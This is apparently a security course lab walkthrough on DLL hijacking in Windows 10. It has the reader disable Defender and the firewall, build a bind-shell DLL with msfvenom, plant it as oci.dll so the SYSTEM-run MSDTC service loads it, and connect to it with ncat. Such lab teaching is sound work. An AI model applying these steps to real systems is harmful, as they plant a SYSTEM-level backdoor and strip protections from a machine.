PMA 124: DLL Hijacking (15 pts extra)

What you need

Purpose

To examine how DLL imports work, and practice repairing broken DLL Import headers.

Use the Windows Machine with Tools

Use the machine from this project:
PMA 41: Windows 10 with Analysis Tools

Purpose

To practice gaining persistence with a malicious DLL file.
If you are using the Windows Machine with Tools, skip all the steps in this gray box.

Disable Windows Defender

Make sure you have disabled Windows Defender in Local Group Policy, as explained in project PMA 40.

Installing the Metasploit Framework

In Firefox, go to

https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

In the "Installing Metasploit on Windows" section, click the "latest Windows installer" link.

Note: On June 24, 2021, I found that version 6.0.49 did not work. Using the previous version from the link below did work.

https://windows.metasploit.com/metasploit-framework-6.0.48%2B20210610152819-1rapid7-1-x64.msi

Put the metasploitframework-latest.msi file in your Downloads folder.

RIght-click the metasploitframework-latest.msi file and click Properties. Click Unblock. Click OK. Open an Administrator Command Prompt and execute these commands:

cd \Users\IEuser\Downloads
metasploitframework-latest.msi
Click through the installer, accepting all the default options.

Creating a Malicious DLL

In the Administrator Command Prompt window, in your Downloads folder, execute this command:
C:\metasploit-framework\bin\msfvenom -p windows/x64/shell_bind_tcp -f dll -o shellbind.dll
The DLL is created, as shown below.

Turning Off the Firewall

At the lower left of the desktop, click the magnifying glass. Type FIRE and open "Firewall & Network Protection".

In the lower center, click Public network.

Turn the firewall off.

Understanding the MSDTC Service

At the lower left of the desktop, click the magnifying glass. Type SERVICES and open Services.

Find the "Distributed Transaction Coordinator" service, as shown below.

From the description, you can see that this process is not important, and from the Status, you can see that it starts automatically.

Right-click "Distributed Transaction Coordinator" and click Properties. Click the "Log On" tab. Here you can see that this processes runs as System, the highest possible privileges.

If it's not System, but something else, like Network Service Account, change it to "Local System Account, as shown below.

Click OK. Click OK again.

Viewing the DLLs in Process Monitor

In Services, stop the "Distributed Transaction Coordinator" service.

At the lower left of the desktop, click the magnifying glass. Type PROCMON and open procmon.

Configure the two filters shown at the top of the list below and click OK.

In Services, start the "Distributed Transaction Coordinator" service.

Find the oci.dll entry, as shown below. This DLL was not found. This is a defect in Windows 10, which we will exploit.

In Process Monitor, in the toolbar, click the third icon (the magnifying glass) to stop the monitoring.

Viewing the Service in Process Explorer

At the lower left of the desktop, click the magnifying glass. Type PROCEXP and open procexp.

Find the msdtc.exe process and click it, as shown below.

From the menu bar, click View, "Show Lower Pane". Then click View, "Lower Pane View", DLLs.

This process uses many DLLs, but oci.dll is missing, as shown below.

Positioning the Malicious DLL

In the Administrator Command Prompt window, in your Downloads folder, execute these commands:
net stop msdtc
copy shellbind.dll c:\windows\system32\oci.dll

Starting Process Monitor

In Process Monitor, in the toolbar, click the fifth icon (the eraser) to clear the old events.

Then click the third icon (the magnifying glass) to start monitoring.

In the Administrator Command Prompt window, execute this command:

net start msdtc
Now the oci.dll file loads as shown below.

PMA 124.1: Detail (10 pts)

The flag is in the Detail field for the first event for oci.dll, covered by a green rectangle in the image below.

PMA 124.2: Using the Shell (5 pts)

Open a new Command Prompt window, and execute these commands:
ncat 127.0.0.1 4444
whoami
The flag is in covered by a green rectangle in the image below.

Removing the Malicious DLL

This DLL messes up the machine somwehat. To remove, it, restart your machine.

Open Resource Monitor and, on the Network tab, check to see if a process is listening on port 4444, as shown below.

When I did it, the PID was 3200.

If a process is listening on that port, end it in Task Manager,on the Details tab, as shown below.

Then, in an Administrator Command Prompt, execute this command:

del c:\windows\system32\oci.dll

Sources

Hacking technique – DLL hijacking
PE Import Table hijacking as a way of achieving persistence - or exploiting DLL side loading
How to compile a DLL using cl.exe
Understanding the Import Address Table
Understanding Import Tables #2 - Manually add imports - by Sunshine
Overview of Windows Programming in C++
C++ #include atlbase.h is not found
https://pentestlab.blog/2020/03/04/persistence-dll-hijacking/

Posted 10-6-2020
Windows Defender adjustments added 3-23-2021
Reference to PMA 40 for disabling Windows Defender added instead 6-6-2021
Metasploit version specified 6-24-2021
Windows 10 with Tools Notes added 8-7-21